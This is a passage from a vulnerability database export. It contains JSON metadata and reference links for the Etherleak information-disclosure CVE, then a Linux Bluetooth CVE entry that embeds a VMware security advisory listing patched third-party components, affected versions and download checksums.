        "url": "http://sunsolve.sun.com/pub-cgi/show.pl?target=cobalt/raq550.eng\u0026amp;nav=patchpage"
      },
      {
        "title": "RHSA-2003:088",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2003-088j.html"
      },
      {
        "title": "RHSA-2003:025",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2003-025j.html"
      },
      {
        "title": "Debian Security Advisories: DSA-336-1 linux-kernel-2.2.20 -- several vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=58ad0f1290ecc1a6e695dfd3fb2f62b8"
      },
      {
        "title": "Debian Security Advisories: DSA-332-1 linux-kernel-2.4.17 -- several vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=17d54d101eabf59a036c2cb585a20ca4"
      },
      {
        "title": "Debian Security Advisories: DSA-312-1 kernel-patch-2.4.18-powerpc -- several vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=96f1908a3b70919deedc21e426bcca93"
      },
      {
        "title": "Debian Security Advisories: DSA-442-1 linux-kernel-2.4.17-s390 -- several vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=e1cd69896feb28712e70e97121722dfc"
      },
      {
        "title": "Debian Security Advisories: DSA-423-1 linux-kernel-2.4.17-ia64 -- several vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=73b8461207a710c041c20418bf7cd39c"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - January 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51"
      },
      {
        "title": "exploits",
        "trust": 0.1,
        "url": "https://github.com/hackerhouse-opensource/exploits "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2003-0001"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000003"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2003-0001"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.1,
        "url": "http://www.atstake.com/research/advisories/2003/a010603-1.txt"
      },
      {
        "trust": 3.0,
        "url": "http://www.kb.cert.org/vuls/id/412115"
      },
      {
        "trust": 2.5,
        "url": "http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
      },
      {
        "trust": 1.7,
        "url": "http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0016.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2003-025.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2003-088.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.osvdb.org/9962"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/7996"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=bugtraq\u0026m=104222046632243\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1031583"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a2665"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1040185"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/archive/1/307564/30/26270/threaded"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/archive/1/305335/30/26420/threaded"
      },
      {
        "trust": 0.8,
        "url": "http://www.nextgenss.com/advisories/etherleak-2003.txt"
      },
      {
        "trust": 0.8,
        "url": "http://www.ietf.org/rfc/rfc1042.txt"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2003-0001"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2003-0001"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/6535"
      },
      {
        "trust": 0.8,
        "url": "http://www.securitytracker.com/alerts/2003/jun/1006959.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0235/"
      },
      {
        "trust": 0.3,
        "url": "http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2f57040"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/353066"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/305335"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/324392"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/306110"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/307453"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/101006724"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/200.html"
      },
      {
        "trust": 0.1,
        "url": "https://packetstormsecurity.com/files/121969/cisco-asa-ethernet-information-leak.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.exploit-db.com/exploits/26076/"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/hackerhouse-opensource/exploits"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/jpla-5bgnyp)."
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#412115"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2003-0051"
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0001"
      },
      {
        "db": "BID",
        "id": "6535"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000003"
      },
      {
        "db": "PACKETSTORM",
        "id": "31775"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0001"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200301-027"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#412115"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2003-0051"
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0001"
      },
      {
        "db": "BID",
        "id": "6535"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2003-000003"
      },
      {
        "db": "PACKETSTORM",
        "id": "31775"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0001"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200301-027"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2003-01-06T00:00:00",
        "db": "CERT/CC",
        "id": "VU#412115"
      },
      {
        "date": "2003-01-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2003-0051"
      },
      {
        "date": "2003-01-17T00:00:00",
        "db": "VULMON",
        "id": "CVE-2003-0001"
      },
      {
        "date": "2003-01-06T00:00:00",
        "db": "BID",
        "id": "6535"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2003-000003"
      },
      {
        "date": "2003-10-06T21:50:59",
        "db": "PACKETSTORM",
        "id": "31775"
      },
      {
        "date": "2003-01-17T05:00:00",
        "db": "NVD",
        "id": "CVE-2003-0001"
      },
      {
        "date": "2003-01-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200301-027"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-09-03T00:00:00",
        "db": "CERT/CC",
        "id": "VU#412115"
      },
      {
        "date": "2015-01-28T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2003-0051"
      },
      {
        "date": "2019-04-30T00:00:00",
        "db": "VULMON",
        "id": "CVE-2003-0001"
      },
      {
        "date": "2015-05-07T17:26:00",
        "db": "BID",
        "id": "6535"
      },
      {
        "date": "2015-01-22T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2003-000003"
      },
      {
        "date": "2019-04-30T14:27:13.710000",
        "db": "NVD",
        "id": "CVE-2003-0001"
      },
      {
        "date": "2021-01-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200301-027"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "31775"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200301-027"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple Vendors Network Device Driver Frame Filling Information Disclosure Vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2003-0051"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200301-027"
      }
    ],
    "trust": 1.2
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200301-027"
      }
    ],
    "trust": 0.6
  }
}

var-201003-1068
Vulnerability from variot

Linux kernel 2.6.18 through 2.6.33, and possibly other versions, allows remote attackers to cause a denial of service (memory corruption) via a large number of Bluetooth sockets, related to the size of sysfs files in (1) net/bluetooth/l2cap.c, (2) net/bluetooth/rfcomm/core.c, (3) net/bluetooth/rfcomm/sock.c, and (4) net/bluetooth/sco.c. Local attackers may be able to exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Remote attackers may exploit this issue to cause a denial-of-service condition. Versions prior to the Linux kernel 2.6.34-rc2-git1 are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


               VMware Security Advisory

Advisory ID: VMSA-2011-0003 Synopsis: Third party component updates for VMware vCenter Server, vCenter Update Manager, ESXi and ESX Issue date: 2011-02-10 Updated on: 2011-02-10 (initial release of advisory) CVE numbers: --- Apache Tomcat --- CVE-2009-2693 CVE-2009-2901 CVE-2009-2902 CVE-2009-3548 CVE-2010-2227 CVE-2010-1157 --- Apache Tomcat Manager --- CVE-2010-2928 --- cURL --- CVE-2010-0734 --- COS Kernel --- CVE-2010-1084 CVE-2010-2066 CVE-2010-2070 CVE-2010-2226 CVE-2010-2248 CVE-2010-2521 CVE-2010-2524 CVE-2010-0008 CVE-2010-0415 CVE-2010-0437 CVE-2009-4308 CVE-2010-0003 CVE-2010-0007 CVE-2010-0307 CVE-2010-1086 CVE-2010-0410 CVE-2010-0730 CVE-2010-1085 CVE-2010-0291 CVE-2010-0622 CVE-2010-1087 CVE-2010-1173 CVE-2010-1437 CVE-2010-1088 CVE-2010-1187 CVE-2010-1436 CVE-2010-1641 CVE-2010-3081 --- Microsoft SQL Express --- CVE-2008-5416 CVE-2008-0085 CVE-2008-0086 CVE-2008-0107 CVE-2008-0106 --- OpenSSL --- CVE-2010-0740 CVE-2010-0433 CVE-2010-3864 CVE-2010-2939 --- Oracle (Sun) JRE --- CVE-2009-3555 CVE-2010-0082 CVE-2010-0084 CVE-2010-0085 CVE-2010-0087 CVE-2010-0088 CVE-2010-0089 CVE-2010-0090 CVE-2010-0091 CVE-2010-0092 CVE-2010-0093 CVE-2010-0094 CVE-2010-0095 CVE-2010-0837 CVE-2010-0838 CVE-2010-0839 CVE-2010-0840 CVE-2010-0841 CVE-2010-0842 CVE-2010-0843 CVE-2010-0844 CVE-2010-0845 CVE-2010-0846 CVE-2010-0847 CVE-2010-0848 CVE-2010-0849 CVE-2010-0850 CVE-2010-0886 CVE-2010-3556 CVE-2010-3566 CVE-2010-3567 CVE-2010-3550 CVE-2010-3561 CVE-2010-3573 CVE-2010-3565 CVE-2010-3568 CVE-2010-3569 CVE-2010-1321 CVE-2010-3548 CVE-2010-3551 CVE-2010-3562 CVE-2010-3571 CVE-2010-3554 CVE-2010-3559 CVE-2010-3572 CVE-2010-3553 CVE-2010-3549 CVE-2010-3557 CVE-2010-3541 CVE-2010-3574 --- pam_krb5 --- CVE-2008-3825 CVE-2009-1384


  1. Summary

Update 1 for vCenter Server 4.1, vCenter Update Manager 4.1, vSphere Hypervisor (ESXi) 4.1, ESXi 4.1, addresses several security issues.

  1. Relevant releases

vCenter Server 4.1 without Update 1,

vCenter Update Manager 4.1 without Update 1,

ESXi 4.1 without patch ESXi410-201101201-SG,

ESX 4.1 without patch ESX410-201101201-SG.

  1. Problem Description

a. vCenter Server and vCenter Update Manager update Microsoft SQL Server 2005 Express Edition to Service Pack 3

Microsoft SQL Server 2005 Express Edition (SQL Express)
distributed with vCenter Server 4.1 Update 1 and vCenter Update
Manager 4.1 Update 1 is upgraded from  SQL Express Service Pack 2
to SQL Express Service Pack 3, to address multiple security
issues that exist in the earlier releases of Microsoft SQL Express.

Customers using other database solutions need not update for
these issues.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-5416, CVE-2008-0085, CVE-2008-0086,
CVE-2008-0107 and CVE-2008-0106 to the issues addressed in MS SQL
Express Service Pack 3.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  affected, no patch planned

Update Manager 4.1       Windows  Update 1
Update Manager 4.0       Windows  affected, patch pending
Update Manager 1.0       Windows  affected, no patch planned

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            any       ESX      not affected
  • Hosted products are VMware Workstation, Player, ACE, Fusion.

b. vCenter Apache Tomcat Management Application Credential Disclosure

The Apache Tomcat Manager application configuration file contains
logon credentials that can be read by unprivileged local users.

The issue is resolved by removing the Manager application in
vCenter 4.1 Update 1.

If vCenter 4.1 is updated to vCenter 4.1 Update 1 the logon
credentials are not present in the configuration file after the
update.

VMware would like to thank Claudio Criscione of Secure Networking
for reporting this issue to us.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-2928 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  not affected
VirtualCenter  2.5       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            any       ESX      not affected
  • hosted products are VMware Workstation, Player, ACE, Fusion.

c. vCenter Server and ESX, Oracle (Sun) JRE is updated to version 1.6.0_21

Oracle (Sun) JRE update to version 1.6.0_21, which addresses
multiple security issues that existed in earlier releases of
Oracle (Sun) JRE.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Oracle (Sun) JRE 1.6.0_19: CVE-2009-3555, CVE-2010-0082,
CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088,
CVE-2010-0089, CVE-2010-0090, CVE-2010-0091, CVE-2010-0092,
CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837,
CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841,
CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845,
CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849,
CVE-2010-0850.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following name to the security issue fixed in
Oracle (Sun) JRE 1.6.0_20: CVE-2010-0886.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  not applicable **
VirtualCenter  2.5       Windows  not applicable **

Update Manager 4.1       Windows  not applicable **
Update Manager 4.0       Windows  not applicable **
Update Manager 1.0       Windows  not applicable **


hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      not applicable **
ESX            3.5       ESX      not applicable **
ESX            3.0.3     ESX      not applicable **
  • hosted products are VMware Workstation, Player, ACE, Fusion. ** this product uses the Oracle (Sun) JRE 1.5.0 family

d. vCenter Update Manager Oracle (Sun) JRE is updated to version 1.5.0_26

Oracle (Sun) JRE update to version 1.5.0_26, which addresses
multiple security issues that existed in earlier releases of
Oracle (Sun) JRE.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Oracle (Sun) JRE 1.5.0_26: CVE-2010-3556, CVE-2010-3566,
CVE-2010-3567, CVE-2010-3550, CVE-2010-3561, CVE-2010-3573,
CVE-2010-3565,CVE-2010-3568, CVE-2010-3569,  CVE-2009-3555,
CVE-2010-1321, CVE-2010-3548, CVE-2010-3551, CVE-2010-3562,
CVE-2010-3571, CVE-2010-3554, CVE-2010-3559, CVE-2010-3572,
CVE-2010-3553, CVE-2010-3549, CVE-2010-3557, CVE-2010-3541,
CVE-2010-3574.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  not applicable **
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  affected, no patch planned

Update Manager 4.1       Windows  Update 1
Update Manager 4.0       Windows  affected, patch pending
Update Manager 1.0       Windows  affected, no patch planned

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      not applicable **
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      affected, no patch planned
ESX            3.0.3     ESX      affected, no patch planned
  • hosted products are VMware Workstation, Player, ACE, Fusion. ** this product uses the Oracle (Sun) JRE 1.6.0 family

e. vCenter Server and ESX Apache Tomcat updated to version 6.0.28

Apache Tomcat updated to version 6.0.28, which addresses multiple
security issues that existed in earlier releases of Apache Tomcat

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Apache Tomcat 6.0.24: CVE-2009-2693, CVE-2009-2901, CVE-2009-2902,i
and CVE-2009-3548.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Apache Tomcat 6.0.28: CVE-2010-2227, CVE-2010-1157.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  not applicable **

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      not applicable **
ESX            3.0.3     ESX      not applicable **
  • hosted products are VMware Workstation, Player, ACE, Fusion. ** this product uses the Apache Tomcat 5.5 family

f. vCenter Server third party component OpenSSL updated to version 0.9.8n

The version of the OpenSSL library in vCenter Server is updated to
0.9.8n.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-0740 and CVE-2010-0433 to the
issues addressed in this version of OpenSSL.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  affected, no patch planned

hosted *       any       any      not applicable

ESXi           any       ESXi     not applicable

ESX            any       ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

g. ESX third party component OpenSSL updated to version 0.9.8p

The version of the ESX OpenSSL library is updated to 0.9.8p.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-3864 and CVE-2010-2939 to the
issues addressed in this update.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not applicable

hosted *       any       any      not applicable
ESXi           4.1       ESXi     ESXi410-201101201-SG
ESXi           4.0       ESXi     affected, patch pending
ESXi           3.5       ESXi     affected, patch pending

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Fusion.

h. ESXi third party component cURL updated

The version of cURL library in ESXi is updated.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2010-0734 to the issues addressed in
this update.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           4.1       ESXi     ESXi410-201101201-SG
ESXi           4.0       ESXi     affected, patch pending
ESXi           3.5       ESXi     affected, patch pending

ESX            any       ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

i. ESX third party component pam_krb5 updated

The version of pam_krb5 library is updated.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-3825 and CVE-2009-1384 to the
issues addressed in the update.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      not affected
ESX            3.5       ESX      not affected
ESX            3.0.3     ESX      not affected
  • hosted products are VMware Workstation, Player, ACE, Fusion.

j. ESX third party update for Service Console kernel

The Service Console kernel is updated to include kernel version
2.6.18-194.11.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-1084, CVE-2010-2066, CVE-2010-2070,
CVE-2010-2226, CVE-2010-2248, CVE-2010-2521, CVE-2010-2524,
CVE-2010-0008, CVE-2010-0415, CVE-2010-0437, CVE-2009-4308,
CVE-2010-0003, CVE-2010-0007, CVE-2010-0307, CVE-2010-1086,
CVE-2010-0410, CVE-2010-0730, CVE-2010-1085, CVE-2010-0291,
CVE-2010-0622, CVE-2010-1087, CVE-2010-1173, CVE-2010-1437,
CVE-2010-1088, CVE-2010-1187, CVE-2010-1436, CVE-2010-1641, and
CVE-2010-3081 to the issues addressed in the update.

Note: This update also addresses the 64-bit compatibility mode
stack pointer underflow issue identified by CVE-2010-3081. This
issue was patched in an ESX 4.1 patch prior to the release of
ESX 4.1 Update 1.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

  • Solution

Please review the patch/release notes for your product and version and verify the checksum of your downloaded file.

VMware vCenter Server 4.1 Update 1 and modules


http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0 Release Notes: http://downloads.vmware.com/support/pubs/vs_pages/vsp_pubs_esx41_vc41.html

File type: .iso md5sum: 729cf247aa5d33ceec431c86377eee1a sha1sum: c1e10a5fcbc1ae9d13348d43541d574c563d66f0

File type: .zip md5sum: fd1441bef48a153f2807f6823790e2f0 sha1sum: 31737a816ed1c08ab3a505fb6db2483f49ad7c19

VMware vSphere Client File type: .exe md5sum: cb6aa91ada1289575355d79e8c2a9f8e sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4

ESXi 4.1 Installable Update 1


http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0 Release Notes:

http://downloads.vmware.com/support/vsphere4/doc/vsp_esxi41_u1_rel_notes.html http://kb.vmware.com/kb/1027919

File type: .iso MD5SUM: d68d6c2e040a87cd04cd18c04c22c998 SHA1SUM: bbaacc0d34503822c14f6ccfefb6a5b62d18ae64

ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.1) File type: .zip MD5SUM: 2f1e009c046b20042fae3b7ca42a840f SHA1SUM: 1c9c644012dec657a705ddd3d033cbfb87a1fab1

ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.0) File type: .zip MD5SUM: 67b924618d196dafaf268a7691bd1a0f SHA1SUM: 9d74b639e703259d9e49c0341158e0d4e45de516

ESXi 4.1 Update 1 (upgrade ZIP from ESXi 3.5) File type: .zip MD5SUM: a6024b9f6c6b7b2c629696afc6d07cf4 SHA1SUM: b3841de1a30617ac68d5a861882aa72de3a93488

VMware Tools CD image for Linux Guest OSes File type: .iso MD5SUM: dad66fa8ece1dd121c302f45444daa70 SHA1SUM: 56535a2cfa7799607356c6fd0a7d9f041da614af

VMware vSphere Client File type: .exe MD5SUM: cb6aa91ada1289575355d79e8c2a9f8e SHA1SUM: f9e3d8eb83196ae7c31aab554e344a46b722b1e4

ESXi Installable Update 1 contains the following security bulletins: ESXi410-201101201-SG.

ESX 4.1 Update 1


http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0 Release Notes:

http://downloads.vmware.com/support/vsphere4/doc/vsp_esx41_u1_rel_notes.html http://kb.vmware.com/kb/1029353

ESX 4.1 Update 1 (DVD ISO) File type: .iso md5sum: b9a275b419a20c7bedf31c0bf64f504e sha1sum: 2d85edcaca8218013585e1eab00bc80db6d96e11

ESX 4.1 Update 1 (upgrade ZIP from ESX 4.1) File type: .zip md5sum: 2d81a87e994aa2b329036f11d90b4c14 sha1sum: c2bfc0cf7ac03d24afd5049ddbd09a865aad1798

Pre-upgrade package for ESX 4.0 to ESX 4.1 Update 1 File type: .zip md5sum: 75f8cebfd55d8a81deb57c27def963c2 sha1sum: 889c15aa8008fe0e29439d0ab3468c2beb1c4fe2

ESX 4.1 Update 1 (upgrade ZIP from ESX 4.0) File type: .zip md5sum: 1dc9035cd10e7e60d27e7a7aef57b4c2 sha1sum: e6d3fb65d83a3e263d0f634a3572025854ff8922

VMware Tools CD image for Linux Guest OSes File type: .iso md5sum: dad66fa8ece1dd121c302f45444daa70 sha1sum: 56535a2cfa7799607356c6fd0a7d9f041da614af

VMware vSphere Client File type: .exe md5sum: cb6aa91ada1289575355d79e8c2a9f8e sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4

ESX410-Update01 contains the following security bulletins: ESX410-201101201-SG (COS kernel, pam_krb5, cURL, OpenSSL, Apache Tomcat, Oracle (Sun) JRE) | http://kb.vmware.com/kb/1027904 ESX410-201101226-SG (glibc) | http://kb.vmware.com/kb/1031330

ESX410-Update01 also contains the following non-security bulletins ESX410-201101211-UG, ESX410-201101213-UG, ESX410-201101215-UG, ESX410-201101202-UG, ESX410-201101203-UG, ESX410-201101204-UG, ESX410-201101206-UG, ESX410-201101207-UG, ESX410-201101208-UG, ESX410-201101214-UG, ESX410-201101216-UG, ESX410-201101217-UG, ESX410-201101218-UG, ESX410-201101219-UG, ESX410-201101220-UG, ESX410-201101221-UG, ESX410-201101222-UG, ESX410-201101225-UG.

To install an individual bulletin use esxupdate with the -b option.

  1. References

